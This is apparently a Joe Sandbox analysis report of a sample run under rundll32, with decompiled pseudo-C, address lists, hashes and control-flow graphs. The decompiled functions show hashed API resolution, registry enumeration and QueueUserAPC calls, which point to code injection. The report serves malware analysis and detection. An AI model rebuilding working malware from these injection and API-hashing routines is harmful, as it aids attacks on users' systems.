                          				if (_t187 == _t237) goto 0xd93356ab;
                          				 *_t187();
                          				_t12 = _t249 + 0x30; // -126
                          				_t89 = E0000021D21DD9335BA4(_t12);
                          				_t13 = _t249 + 0x30; // -126
                          				r11d = _t89;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t18 = _t269 + 3; // 0x3
                          				E0000021D21DD93313EC(_t18, _t187, __rbx, _t13);
                          				 *((long long*)(_t249 + 0x40)) = _t187;
                          				if (_t187 == _t237) goto 0xd93359e0;
                          				r12d = 0xfb849f8f;
                          				E0000021D21DD933908C(r12d, _t187,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t187 == _t237) goto 0xd9335711;
                          				 *_t187();
                          				goto 0xd9335713;
                          				E0000021D21DD933908C(r12d, _t187,  *((intOrPtr*)(_t244 + 0x18)));
                          				if (_t187 == _t237) goto 0xd933572e;
                          				r13d =  *_t187();
                          				goto 0xd9335731;
                          				r13d = 0;
                          				_t23 = _t192 + 7; // 0x7
                          				r8d = _t273 + _t23;
                          				HeapAlloc(_t277, _t273, _t270);
                          				if (_t187 == _t237) goto 0xd93359d2;
                          				_t24 = _t192 + 1; // 0x1
                          				r8d = _t24;
                          				0xd93347b0();
                          				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0xd93357a3;
                          				if ( *((intOrPtr*)(_t249 + 0xa8)) == 0) goto 0xd93357a3;
                          				_t188 =  *((intOrPtr*)(_t249 + 0x38));
                          				r8d = 6;
                          				0xd93347b0();
                          				_t32 = _t273 + 1; // 0x1
                          				r8d = _t32;
                          				0xd93347b0();
                          				_t234 = _t187; // executed
                          				_t104 = E0000021D21DD933A238(_t9, 0, _t167,  *((intOrPtr*)(_t249 + 0xa8)), _t192,  *((intOrPtr*)(_t249 + 0x90)), _t234, _t249 + 0x48, _t264); // executed
                          				if (_t104 != 0) goto 0xd93359c4;
                          				_t193 =  *((intOrPtr*)(_t249 + 0xb0));
                          				 *_t193 =  *((intOrPtr*)(_t249 + 0x48));
                          				E0000021D21DD933908C(0xfb849f8f, _t188,  *((intOrPtr*)(_t244 + 0x18)));
                          				if (_t188 == _t237) goto 0xd93357ea;
                          				 *_t188();
                          				goto 0xd93357ec;
                          				 *((intOrPtr*)(_t193 + 0x10)) = 0;
                          				_t41 = _t234 + 0x34; // 0x34
                          				r8d = _t41;
                          				 *((intOrPtr*)(_t193 + 0x14)) = 1;
                          				HeapAlloc(_t237, _t240, _t243);
                          				if (_t188 == _t237) goto 0xd93359b6;
                          				_t43 = _t249 + 0x30; // 0xfb849fcf
                          				_t109 = E0000021D21DD9335BA4(_t43);
                          				_t44 = _t249 + 0x30; // 0xfb849fcf
                          				r11d = _t109;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t49 = _t269 + 3; // 0x3
                          				E0000021D21DD93313EC(_t49, _t188, _t193, _t44);
                          				if (_t188 == _t237) goto 0xd93359a8;
                          				0xd933b158();
                          				HeapFree(??, ??, ??);
                          				 *((long long*)(_t193 + 8)) = _t188;
                          				if ( *((intOrPtr*)(_t249 + 0xa0)) == _t237) goto 0xd93359fa;
                          				_t141 =  *((intOrPtr*)(_t249 + 0xa8));
                          				if (_t141 == 0) goto 0xd93359fa;
                          				r8d = _t141;
                          				_t190 = _t193 + 0x28;
                          				 *((long long*)(_t249 + 0x20)) = _t190;
                          				if (E0000021D21DD9337CF4(_t190, _t193,  *((intOrPtr*)(_t249 + 0x90)),  *((intOrPtr*)(_t249 + 0xa0)), _t188, _t193 + 0x18) != 0) goto 0xd93359a8;
                          				r15d = 0x77;
                          				 *((intOrPtr*)(_t193 + 0x2c)) = 1;
                          				HeapAlloc(??, ??, ??);
                          				if (_t190 == _t237) goto 0xd93359a3;
                          				_t62 = _t249 + 0x30; // 0xfb849fcf
                          				_t122 = E0000021D21DD9335BA4(_t62);
                          				_t63 = _t249 + 0x30; // 0xfb849fcf
                          				r11d = _t122;
                          				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
                          				_t68 = _t269 + 3; // 0x3
                          				_t131 = E0000021D21DD93313EC(_t68, _t190, _t193, _t63);
                          				 *((long long*)(_t249 + 0x48)) = _t190;
                          				if (_t190 == _t237) goto 0xd9335995;
                          				0xd933b158();
                          				r11d = _t131;
                          				r15d = r15d - r11d;
                          				 *((long long*)(_t249 + 0x20)) =  *((intOrPtr*)(_t249 + 0x38)) + 0x21dd934129f;
                          				0xd933b158();
                          				 *((long long*)(_t193 + 0x20)) = _t190;
                          				goto 0xd93359b9;
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				HeapFree(??, ??, ??);
                          				return 2;
                          			}





























                          0x21dd9335638
                          0x21dd9335638
                          0x21dd9335638
                          0x21dd933563b
                          0x21dd933563f
                          0x21dd9335643
                          0x21dd9335647
                          0x21dd9335656
                          0x21dd933565a
                          0x21dd9335661
                          0x21dd9335678
                          0x21dd933567f
                          0x21dd9335687
                          0x21dd933568c
                          0x21dd933568f
                          0x21dd933569a
                          0x21dd93356a2
                          0x21dd93356a9
                          0x21dd93356ab
                          0x21dd93356b0
                          0x21dd93356b5
                          0x21dd93356ba
                          0x21dd93356d4
                          0x21dd93356d7
                          0x21dd93356db
                          0x21dd93356e3
                          0x21dd93356eb
                          0x21dd93356f5
                          0x21dd93356fe
                          0x21dd9335706
                          0x21dd933570b
                          0x21dd933570f
                          0x21dd933571a
                          0x21dd9335722
                          0x21dd9335729
                          0x21dd933572c
                          0x21dd933572e
                          0x21dd9335731
                          0x21dd9335731
                          0x21dd933573b
                          0x21dd9335747
                          0x21dd933574d
                          0x21dd933574d
                          0x21dd9335757
                          0x21dd933576b
                          0x21dd9335774
                          0x21dd9335776
                          0x21dd933577b
                          0x21dd933578d
                          0x21dd9335792
                          0x21dd9335792
                          0x21dd933579e
                          0x21dd93357b0
                          0x21dd93357b3
                          0x21dd93357ba
                          0x21dd93357c0
                          0x21dd93357d2
                          0x21dd93357d9
                          0x21dd93357e1
                          0x21dd93357e6
                          0x21dd93357e8
                          0x21dd93357f1
                          0x21dd93357f4
                          0x21dd93357f4
                          0x21dd93357f8
                          0x21dd93357ff
                          0x21dd933580b
                          0x21dd9335811
                          0x21dd9335816
                          0x21dd933581b
                          0x21dd9335820
                          0x21dd933583a
                          0x21dd933583d
                          0x21dd9335841
                          0x21dd933584c
                          0x21dd9335871
                          0x21dd933587e
                          0x21dd933588c
                          0x21dd9335893
                          0x21dd9335899
                          0x21dd93358a2
                          0x21dd93358a8
                          0x21dd93358b3
                          0x21dd93358bb
                          0x21dd93358c7
                          0x21dd93358cd
                          0x21dd93358db
                          0x21dd93358e2
                          0x21dd93358ee
                          0x21dd93358f4
                          0x21dd93358f9
                          0x21dd93358fe
                          0x21dd9335903
                          0x21dd933591d
                          0x21dd9335920
                          0x21dd9335924
                          0x21dd9335929
                          0x21dd9335931
                          0x21dd9335950
                          0x21dd933595d
                          0x21dd9335968
                          0x21dd9335970
                          0x21dd9335980
                          0x21dd933598a
                          0x21dd9335993
                          0x21dd933599d
                          0x21dd93359b0
                          0x21dd93359be
                          0x21dd93359cc
                          0x21dd93359da
                          0x21dd93359f9

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc$ErrorLastSleep
                          • String ID:
                          • API String ID: 3047968389-0
                          • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                          • Instruction ID: 885552a239e77f974d07275958c8e99f592857b6211829dc2d7076cd98aa9dd4
                          • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                          • Instruction Fuzzy Hash: 9CA1DE37254B80D6EB18DF66F5082DA63A2F7D9BC4F446111AE4E87B6CDE3AD905C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 76 21dd93337e0-21dd9333845 GetModuleHandleA call 21dd93340f8 79 21dd93338bf-21dd93338c2 76->79 80 21dd9333847-21dd9333858 call 21dd933908c 76->80 82 21dd9333cc0-21dd9333cd5 79->82 83 21dd93338c8-21dd93338e1 HeapAlloc 79->83 88 21dd9333866 80->88 89 21dd933385a-21dd9333864 80->89 85 21dd93338e7-21dd9333905 call 21dd933487a call 21dd933908c 83->85 86 21dd9333cbb 83->86 97 21dd933390d-21dd933394c call 21dd933638c call 21dd933908c 85->97 98 21dd9333907 85->98 86->82 91 21dd9333869-21dd933387a call 21dd93340f8 88->91 89->91 91->79 99 21dd933387c-21dd9333888 call 21dd9335fc8 91->99 109 21dd933395e 97->109 110 21dd933394e-21dd933395c 97->110 98->97 102 21dd933388d-21dd9333892 99->102 102->79 104 21dd9333894-21dd93338aa call 21dd9335fc8 102->104 104->79 111 21dd93338ac-21dd93338bd call 21dd9335fc8 104->111 112 21dd9333961-21dd9333968 109->112 110->112 111->79 113 21dd933398e-21dd93339b6 HeapAlloc 112->113 114 21dd933396a-21dd933397b call 21dd933908c 112->114 118 21dd9333a8e 113->118 119 21dd93339bc-21dd93339d0 call 21dd933908c 113->119 126 21dd933397d-21dd933397f 114->126 127 21dd9333984-21dd9333989 114->127 121 21dd9333a93-21dd9333a99 118->121 132 21dd93339d2-21dd93339f9 RegOpenKeyW 119->132 133 21dd93339fb 119->133 124 21dd9333a9f-21dd9333ae9 call 21dd93347b0 call 21dd933a0ac 121->124 125 21dd9333cb1-21dd9333cb9 call 21dd9336ce4 121->125 145 21dd9333b05-21dd9333b08 124->145 146 21dd9333aeb-21dd9333b03 call 21dd933a0ac 124->146 125->82 139 21dd9333caa 126->139 130 21dd9333cac-21dd9333caf 127->130 130->82 130->125 137 21dd93339fe-21dd9333a00 132->137 133->137 140 21dd9333a7e-21dd9333a8c HeapFree 137->140 141 21dd9333a02-21dd9333a13 call 21dd933908c 137->141 139->130 140->121 147 21dd9333a30 141->147 148 21dd9333a15-21dd9333a2e RegEnumKeyW 141->148 145->125 150 21dd9333b0e-21dd9333b1f call 21dd9335058 145->150 146->145 151 21dd9333a33-21dd9333a35 147->151 148->151 160 21dd9333b21-21dd9333b35 call 21dd933405c 150->160 161 21dd9333b4b-21dd9333b4e 150->161 154 21dd9333a37-21dd9333a4a call 21dd9336644 151->154 155 21dd9333a4c-21dd9333a52 151->155 154->141 154->155 158 21dd9333a5d-21dd9333a6e call 21dd933908c 155->158 159 21dd9333a54-21dd9333a5b 155->159 171 21dd9333a70-21dd9333a78 RegCloseKey 158->171 172 21dd9333a7a-21dd9333a7c 158->172 159->158 160->161 169 21dd9333b37-21dd9333b47 call 21dd933405c 160->169 161->125 162 21dd9333b54-21dd9333b5f call 21dd933a7a0 161->162 174 21dd9333b61-21dd9333b66 162->174 175 21dd9333b6b-21dd9333b99 162->175 169->161 171->172 172->121 172->140 174->125 177 21dd9333baf 175->177 178 21dd9333b9b-21dd9333ba3 175->178 179 21dd9333bb2-21dd9333bb5 177->179 178->179 180 21dd9333ba5-21dd9333bad call 21dd9334d70 178->180 182 21dd9333bc1-21dd9333bd6 call 21dd933a8e8 179->182 183 21dd9333bb7-21dd9333bbc 179->183 180->179 182->183 187 21dd9333bd8-21dd9333bf4 call 21dd933908c 182->187 183->125 190 21dd9333bf6-21dd9333bfa 187->190 191 21dd9333bfc 187->191 192 21dd9333bff-21dd9333c07 190->192 191->192 194 21dd9333c9d-21dd9333ca5 call 21dd9339d6c 192->194 195 21dd9333c0d-21dd9333c1e call 21dd933908c 192->195 194->139 199 21dd9333c20-21dd9333c24 195->199 200 21dd9333c26 195->200 201 21dd9333c29-21dd9333c3a call 21dd933908c 199->201 200->201 205 21dd9333c3c-21dd9333c49 201->205 206 21dd9333c4b 201->206 207 21dd9333c4e-21dd9333c55 205->207 206->207 209 21dd9333c6f-21dd9333c7c call 21dd933908c 207->209 210 21dd9333c57-21dd9333c64 call 21dd933908c 207->210 215 21dd9333c8f 209->215 216 21dd9333c7e-21dd9333c8d QueueUserAPC 209->216 210->126 217 21dd9333c6a-21dd9333c6d 210->217 218 21dd9333c92-21dd9333c95 215->218 216->218 217->130 218->82 219 21dd9333c97-21dd9333c9b 218->219 219->210
                          C-Code - Quality: 39%
                          			E0000021D21DD93337E0(long long* __rax, long long __rcx, void* __r9) {
                          				void* __rbx;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t80;
                          				void* _t83;
                          				void* _t84;
                          				void* _t100;
                          				void* _t176;
                          				long long* _t222;
                          				long long* _t223;
                          				long long* _t224;
                          				long long _t225;
                          				intOrPtr _t226;
                          				long long* _t228;
                          				long long* _t229;
                          				void* _t230;
                          				void* _t288;
                          				long long _t289;
                          				void* _t291;
                          				void* _t294;
                          				intOrPtr _t295;
                          				intOrPtr _t296;
                          				void* _t300;
                          				void* _t301;
                          				void* _t303;
                          				void* _t310;
                          				void* _t313;
                          				long long _t314;
                          				void* _t315;
                          				void* _t316;
                          				long long _t319;
                          				long long* _t320;
                          				void* _t322;
                          				CHAR* _t327;
                          
                          				_t222 = __rax;
                          				 *((long long*)(_t300 + 8)) = __rcx;
                          				_t301 = _t300 - 0x248;
                          				_t292 =  *0xd933d458;
                          				_t295 =  *((intOrPtr*)( *0xd933d458 + 8));
                          				 *((long long*)(_t301 + 0x20)) =  *0xd933d448;
                          				 *(_t301 + 0x298) =  *0xd933d450;
                          				GetModuleHandleA(_t327);
                          				_t80 = E0000021D21DD93340F8(__rax,  *0xd933d458 + 0x18, _t303, _t313, _t322, _t319);
                          				r13d = 0;
                          				if (_t80 != r13d) goto 0xd93338bf;
                          				E0000021D21DD933908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t222 == _t319) goto 0xd9333866;
                          				 *_t222();
                          				goto 0xd9333869;
                          				_t223 = _t319;
                          				_t83 = E0000021D21DD93340F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288); // executed
                          				if (_t83 != r13d) goto 0xd93338bf;
                          				_t84 = E0000021D21DD9335FC8(_t223, _t230,  *0xd933d448 + 0x21dd9341082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
                          				if (_t84 != r13d) goto 0xd93338bf;
                          				if (E0000021D21DD9335FC8(_t223, _t230,  *0xd933d448 + 0x21dd9341079, _t292 + 0x20, _t292, _t295) != r13d) goto 0xd93338bf;
                          				if (E0000021D21DD9335FC8(_t223, _t230,  *0xd933d448 + 0x21dd9341092, _t292 + 0x30, _t292, _t295) != r13d) goto 0xd9333cc0;
                          				HeapAlloc(??, ??, ??);
                          				_t289 = _t223;
                          				if (_t223 == _t319) goto 0xd9333cbb;
                          				0xd933487a();
                          				E0000021D21DD933908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
                          				if (_t223 == _t319) goto 0xd933390d;
                          				 *_t223();
                          				_t24 = _t289 + 0xa8; // 0xa8
                          				_t224 = _t24;
                          				 *_t224 = _t224;
                          				 *((long long*)(_t289 + 0xb0)) = _t224;
                          				 *(_t289 + 0x9c) = r13d;
                          				 *(_t289 + 0xa0) = r13d;
                          				 *(_t289 + 0x98) = r13d;
                          				E0000021D21DD933638C(_t224, _t230, _t292, _t230);
                          				E0000021D21DD933908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t224 == _t319) goto 0xd933395e;
                          				r9d = 0;
                          				r8d = 0;
                          				 *_t224();
                          				goto 0xd9333961;
                          				_t225 = _t319;
                          				 *((long long*)(_t289 + 0x28)) = _t225;
                          				if (_t225 != _t319) goto 0xd933398e;
                          				E0000021D21DD933908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t225 == _t319) goto 0xd9333984;
                          				 *_t225();
                          				goto 0xd9333caa;
                          				goto 0xd9333cac;
                          				r8d = 0x1102;
                          				HeapAlloc(??, ??, ??);
                          				_t320 = _t225;
                          				_t34 = _t295 + 0x7f; // 0x7f
                          				r12d = _t34;
                          				if (_t225 == _t295) goto 0xd9333a8e;
                          				 *_t225 = 0;
                          				E0000021D21DD933908C(0x3d06c463, _t225,  *((intOrPtr*)( *0xd933d458 + 0x20)));
                          				if (_t225 == _t295) goto 0xd93339fb;
                          				RegOpenKeyW(??, ??, ??); // executed
                          				goto 0xd93339fe;
                          				if (r12d != 0) goto 0xd9333a7e;
                          				E0000021D21DD933908C(0xdf514773, _t225,  *((intOrPtr*)( *0xd933d458 + 0x20)));
                          				if (_t225 == 0) goto 0xd9333a30;
                          				r9d = 0x104;
                          				RegEnumKeyW(??, ??, ??, ??); // executed
                          				goto 0xd9333a33;
                          				if (r12d != 0) goto 0xd9333a4c;
                          				_t100 = E0000021D21DD9336644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
                          				if (_t100 == 0) goto 0xd9333a02;
                          				if (_t100 != 0x103) goto 0xd9333a5d;
                          				 *0xd933d438 = _t320;
                          				E0000021D21DD933908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0xd933d458 + 0x20)));
                          				if (_t225 == 0) goto 0xd9333a7a;
                          				RegCloseKey(??); // executed
                          				if (0 == 0) goto 0xd9333a93;
                          				HeapFree(??, ??, ??);
                          				goto 0xd9333a93;
                          				r13d = 0;
                          				if (8 != r13d) goto 0xd9333cb1;
                          				_t296 =  *0xd933d448;
                          				_t47 = _t320 + 8; // 0x8
                          				r8d = _t47;
                          				0xd93347b0();
                          				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
                          				if (E0000021D21DD933A0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x21dd9330000 + _t296 + 0x11188) == r13d) goto 0xd9333b05;
                          				_t310 = 0x21dd9330000 + _t296 + 0x111e0;
                          				if (E0000021D21DD933A0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0xd9333cb1;
                          				_t57 = _t289 + 8; // 0x8
                          				_t286 = _t57;
                          				if (E0000021D21DD9335058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0xd9333b4b;
                          				E0000021D21DD933405C(_t230, _t289, _t57, _t289, _t292, _t296);
                          				 *((long long*)(_t289 + 0x30)) = _t225;
                          				if (_t225 == _t320) goto 0xd9333b4b;
                          				_t59 = _t289 + 8; // 0x8
                          				E0000021D21DD933405C(_t230, _t59, _t57, _t289, _t292, _t296);
                          				 *((long long*)(_t289 + 0x38)) = _t225;
                          				_t144 =  !=  ? r13d : 8;
                          				_t207 = ( !=  ? r13d : 8) - r13d;
                          				if (( !=  ? r13d : 8) != r13d) goto 0xd9333cb1;
                          				if (E0000021D21DD933A7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0xd9333b6b;
                          				goto 0xd9333cb1;
                          				_t226 =  *((intOrPtr*)(_t301 + 0x20));
                          				r9d =  *(_t301 + 0x298);
                          				_t314 = _t226 + 0x21dd933f000;
                          				r8d =  *(_t314 + 2) & 0x0000ffff;
                          				if (_t226 - _t310 + 8 <= 0) goto 0xd9333baf;
                          				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0xd9333bb2;
                          				E0000021D21DD9334D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
                          				goto 0xd9333bb2;
                          				_t228 = _t320;
                          				if (_t228 != _t320) goto 0xd9333bc1;
                          				goto 0xd9333cb1;
                          				r9d = r9d ^ 0xecb028fc;
                          				E0000021D21DD933A8E8(r9d, _t228, _t314, __r9);
                          				if (_t228 == _t320) goto 0xd9333bb7;
                          				 *((long long*)(_t289 + 0x40)) = _t314;
                          				 *0xd933d440 = _t289;
                          				E0000021D21DD933908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t228 == _t320) goto 0xd9333bfc;
                          				 *_t228();
                          				goto 0xd9333bff;
                          				_t229 = _t320;
                          				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0xd9333c9d;
                          				E0000021D21DD933908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0xd9333c26;
                          				 *_t229();
                          				goto 0xd9333c29;
                          				E0000021D21DD933908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0xd9333c4b;
                          				r8d = r13d;
                          				 *_t229();
                          				goto 0xd9333c4e;
                          				if (_t320 != _t320) goto 0xd9333c6f;
                          				E0000021D21DD933908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 != _t320) goto 0xd933397d;
                          				goto 0xd9333cac;
                          				E0000021D21DD933908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                          				if (_t229 == _t320) goto 0xd9333c8f;
                          				QueueUserAPC(??, ??, ??); // executed
                          				goto 0xd9333c92;
                          				if (r13d != r13d) goto 0xd9333cc0;
                          				goto 0xd9333c57;
                          				asm("lock add dword [esi+0x38], 0x1");
                          				if (E0000021D21DD9339D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0xd9333cc0;
                          				E0000021D21DD9336CE4(_t229, _t230, _t289, _t320, _t292);
                          				goto 0xd9333cc0;
                          				return 8;
                          			}






































                          0x21dd93337e0
                          0x21dd93337e0
                          0x21dd93337f1
                          0x21dd93337ff
                          0x21dd933380c
                          0x21dd9333817
                          0x21dd9333824
                          0x21dd933382b
                          0x21dd9333838
                          0x21dd933383d
                          0x21dd9333845
                          0x21dd9333850
                          0x21dd9333858
                          0x21dd9333862
                          0x21dd9333864
                          0x21dd9333866
                          0x21dd9333870
                          0x21dd933387a
                          0x21dd9333888
                          0x21dd9333892
                          0x21dd93338aa
                          0x21dd93338c2
                          0x21dd93338d5
                          0x21dd93338db
                          0x21dd93338e1
                          0x21dd93338ef
                          0x21dd93338fd
                          0x21dd9333905
                          0x21dd933390b
                          0x21dd933390d
                          0x21dd933390d
                          0x21dd9333917
                          0x21dd933391a
                          0x21dd9333921
                          0x21dd9333928
                          0x21dd933392f
                          0x21dd9333936
                          0x21dd9333944
                          0x21dd933394c
                          0x21dd933394e
                          0x21dd9333951
                          0x21dd933395a
                          0x21dd933395c
                          0x21dd933395e
                          0x21dd9333961
                          0x21dd9333968
                          0x21dd9333973
                          0x21dd933397b
                          0x21dd933397d
                          0x21dd933397f
                          0x21dd9333989
                          0x21dd9333997
                          0x21dd93339a4
                          0x21dd93339ac
                          0x21dd93339af
                          0x21dd93339af
                          0x21dd93339b6
                          0x21dd93339bc
                          0x21dd93339c8
                          0x21dd93339d0
                          0x21dd93339f5
                          0x21dd93339f9
                          0x21dd9333a00
                          0x21dd9333a0b
                          0x21dd9333a13
                          0x21dd9333a22
                          0x21dd9333a2a
                          0x21dd9333a2e
                          0x21dd9333a35
                          0x21dd9333a41
                          0x21dd9333a4a
                          0x21dd9333a52
                          0x21dd9333a54
                          0x21dd9333a66
                          0x21dd9333a6e
                          0x21dd9333a78
                          0x21dd9333a7c
                          0x21dd9333a86
                          0x21dd9333a8c
                          0x21dd9333a93
                          0x21dd9333a99
                          0x21dd9333a9f
                          0x21dd9333aa6
                          0x21dd9333aa6
                          0x21dd9333ab7
                          0x21dd9333ad6
                          0x21dd9333ae9
                          0x21dd9333aeb
                          0x21dd9333b08
                          0x21dd9333b0e
                          0x21dd9333b0e
                          0x21dd9333b1f
                          0x21dd9333b29
                          0x21dd9333b2e
                          0x21dd9333b35
                          0x21dd9333b37
                          0x21dd9333b3b
                          0x21dd9333b43
                          0x21dd9333b47
                          0x21dd9333b4b
                          0x21dd9333b4e
                          0x21dd9333b5f
                          0x21dd9333b66
                          0x21dd9333b6b
                          0x21dd9333b70
                          0x21dd9333b78
                          0x21dd9333b83
                          0x21dd9333b99
                          0x21dd9333ba3
                          0x21dd9333ba8
                          0x21dd9333bad
                          0x21dd9333baf
                          0x21dd9333bb5
                          0x21dd9333bbc
                          0x21dd9333bc1
                          0x21dd9333bce
                          0x21dd9333bd6
                          0x21dd9333bd8
                          0x21dd9333be5
                          0x21dd9333bec
                          0x21dd9333bf4
                          0x21dd9333bf8
                          0x21dd9333bfa
                          0x21dd9333bfc
                          0x21dd9333c07
                          0x21dd9333c16
                          0x21dd9333c1e
                          0x21dd9333c20
                          0x21dd9333c24
                          0x21dd9333c32
                          0x21dd9333c3a
                          0x21dd9333c3e
                          0x21dd9333c44
                          0x21dd9333c49
                          0x21dd9333c55
                          0x21dd9333c5c
                          0x21dd9333c64
                          0x21dd9333c6d
                          0x21dd9333c74
                          0x21dd9333c7c
                          0x21dd9333c8b
                          0x21dd9333c8d
                          0x21dd9333c95
                          0x21dd9333c9b
                          0x21dd9333c9d
                          0x21dd9333caf
                          0x21dd9333cb4
                          0x21dd9333cb9
                          0x21dd9333cd5

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.825281468.0000021DD9330000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021DD9330000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_21dd9330000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpenQueueUser
                          • String ID:
                          • API String ID: 3014043065-0
                          • Opcode ID: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                          • Instruction ID: 7dcf0021b135ed6fe77224f9ac4cf513adaf321a44e729a39e0cb8ea451e43f0
                          • Opcode Fuzzy Hash: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                          • Instruction Fuzzy Hash: 0BD1C337384740D6EA6CAF61F08C3EA6391F7A4784F90A511DE4E477B9DE3AD8998301
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 489 21dd93331c0-21dd933320b call 21dd9336c34 492 21dd9333211-21dd9333219 489->492 493 21dd9333469-21dd933347a call 21dd933908c 489->493 495 21dd933322c 492->495 496 21dd933321b 492->496 501 21dd9333482 493->501 502 21dd933347c-21dd9333480 493->502 500 21dd9333234-21dd9333245 call 21dd933908c 495->500 497 21dd933321d-21dd9333221 496->497 498 21dd9333223-21dd933322a 496->498 497->495 497->498 498->500 507 21dd933325f 500->507 508 21dd9333247-21dd9333257 500->508 505 21dd9333487-21dd93334a0 501->505 502->505 509 21dd9333262-21dd9333278 HeapFree 507->509 510 21dd933325d 508->510 509->493 511 21dd933327e-21dd933328a 509->511 510->509 512 21dd93332be-21dd93332cf call 21dd9336c34 511->512 513 21dd933328c-21dd933329a call 21dd933908c 511->513 512->493 518 21dd93332d5-21dd93332e7 512->518 519 21dd93332b4 513->519 520 21dd933329c-21dd93332b2 513->520 522 21dd9333326 518->522 523 21dd93332e9-21dd93332ff call 21dd933908c 518->523 521 21dd93332b6-21dd93332b8 519->521 520->521 521->493 521->512 526 21dd933332b-21dd933333c call 21dd933908c 522->526 530 21dd9333301-21dd9333310 523->530 531 21dd9333316-21dd9333324 523->531 532 21dd9333350 526->532 533 21dd933333e-21dd933334e 526->533 530->531 531->526 534 21dd9333353-21dd9333369 HeapFree 532->534 533->534 534->493 536 21dd933336f-21dd9333380 call 21dd9336c34 534->536 536->493 539 21dd9333386-21dd9333397 call 21dd933908c 536->539 542 21dd93333de 539->542 543 21dd9333399-21dd93333d5 539->543 544 21dd93333e1-21dd93333f7 HeapFree 542->544 546 21dd93333dc 543->546 544->493 545 21dd93333f9-21dd9333417 call 21dd933908c 544->545 549 21dd9333431 545->549 550 21dd9333419-21dd933342f 545->550 546->544 551 21dd9333433-21dd9333435 549->551 550->551 551->505 553 21dd9333437-21dd9333451 call 21dd933908c 551->553 553->505 556 21dd9333453-21dd9333467 553->556 556->505
                          C-Code - Quality: 24%
                          			E0000021D21DD93331C0(long long __rbx, intOrPtr* __rcx, long long* __rdx, void* __r9) {
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t110;
                          				long long* _t130;
                          				long long* _t131;
                          				long long* _t132;
                          				long long* _t133;
                          				long long* _t134;
                          				void* _t163;
                          				void* _t164;
                          				intOrPtr* _t165;
                          				void* _t167;
                          				void* _t170;
                          				long long* _t172;
                          				void* _t174;
                          				void* _t175;
                          				void* _t177;
                          				long _t188;
                          				void* _t191;
                          				void* _t194;
                          				void* _t197;
                          
                          				_t134 = __rbx;
                          				 *((long long*)(_t174 + 0x10)) = __rbx;
                          				 *((intOrPtr*)(_t174 + 0x20)) = r9d;
                          				 *((intOrPtr*)(_t174 + 0x18)) = r8d;
                          				_t175 = _t174 - 0x50;
                          				_t168 =  *__rcx;
                          				_t130 = __rdx;
                          				_t165 = __rcx;
                          				E0000021D21DD9336C34(__rbx, __rdx, __rcx,  *__rcx, _t170, _t177, _t197, _t194);
                          				if (_t130 == _t134) goto 0xd9333469;
                          				_t110 =  *((char*)(_t165 + 0x75)) - 6;
                          				_t6 = _t134 + 4; // 0x4
                          				r12d = _t6;
                          				if (_t110 > 0) goto 0xd933322c;
                          				if (_t110 != 0) goto 0xd9333223;
                          				if ( *((char*)(_t165 + 0x74)) - 2 > 0) goto 0xd933322c;
